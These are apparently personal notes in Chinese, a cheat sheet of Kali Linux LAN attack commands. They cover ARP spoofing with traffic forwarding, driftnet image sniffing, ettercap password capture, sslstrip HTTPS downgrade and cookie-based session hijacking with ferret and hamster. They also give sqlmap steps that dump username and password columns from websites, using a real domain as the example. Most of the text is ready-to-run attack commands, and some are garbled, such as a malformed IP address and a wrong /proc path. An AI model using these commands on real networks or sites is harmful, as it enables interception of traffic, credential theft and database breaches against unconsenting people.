kali 局域網嗅探
1、局域網圖片嗅探
工具 arpspoof
arpspoof -i eth0 -t 192.1681.10(網卡 目標地址) 192.168.1.1 局域網網關,如果在Windows中可以使用局域網掃描工具 Advanced ip Scanner
linux中 掃描局域網在線的主機 fping -asg 192.168.1.0/24
欺騙的同時不能是對方斷網,使用流量轉發 echo 1 >/proc/sys/net/ipv4/ip_forward
檢查是否成功執行 cat proc/sys/sys/net/ipv4/ip_forward
獲取本機網卡的圖片 driftnet -i eth0
2、密碼嗅探 <http>
先使用欺騙命令 arpspoof
ettercap -Tq - i eth0
3、ssh遠程連接操作 鏈接kali shell模式註銷
ctrl +Alt +F1 切換到 命令行模式
使用命令 /etc/init.d/ssh start
使用Xshell 鏈接kali ip
4、抓包https流量
首先編輯 vim /etc/ettercap/etter.conf 修改 ****linux ** 取消 #
開啟 sslstrip -a -f -k
開啟欺騙 arpspoof 同時轉發流量
在https 網址上進行登陸 抓取流量
5、會話劫持登陸已經被別人登陸的網站
快速添加之前使用的命令 ! + 部分命令 就會補全
先使用arpspoof 欺騙 同時流量轉發
使用 wireshark 流量抓包工具
使用 ferret 重新生成抓包的工具
ferret -r j加上 抓取的流量包 會生成一個 txt文件
使用 hamster -h打開一個瀏覽器 -----》 設置代理和端口
或者不適用欺騙,直接使用 ferret -i eth0 然後使用 hamster 瀏覽網頁
另外基於界面的軟件 cookieCadger
6、sqlmap 對asp網站的檢測
sqlmap -u "www.baidu.com.id=2"
sqlmap -u "www.baidu.com.id=2" --tables
sqlmap -u "www.baidu.com.id=2" --columns -T "user"
sqlmap -u "www.baidu.com.id=2" --dump -C "username ,password" -T "user"
cookie使用 sqlmap -u “ www.baidu.com.php.id=2” --cookie "id=23" --level=2
7、sqlmap 對php網站的檢測
sqlmap -u “ www.baidu.com.php.id=2” --is-dba 檢測是否是dba 形式 (可以將文件寫入目錄)
sqlmap -u “ www.baidu.com.php.id=2” --dbs (列出所有的數據庫)
sqlmap -u “ www.baidu.com.php.id=2” --current-db (猜測當前的數據庫)
sqlmap -u “ www.baidu.com.php.id=2” --tables -D "admin" (根據admin數據庫猜測表名)
sqlmap -u “ www.baidu.com.php.id=2” --columns -T "pss" -D "admin"
sqlmap -u “ www.baidu.com.php.id=2” --dump -C "username,password " -T "pss" -D "admin"
8、實例檢測
下面是我檢測的一個網上的PHP的網站 存在SQL註入的漏洞
9、Metasploit
msfconsole
這一節我之前的微博已經寫過很多,不過還沒喲整理,想著抽空整理一遍
10、流量分析工具 nload
附: 卸載之前暗轉的軟件 apt-get remove
修復沒有成功安裝的軟件 apt --fix-broken install
11、
kali 局域網嗅探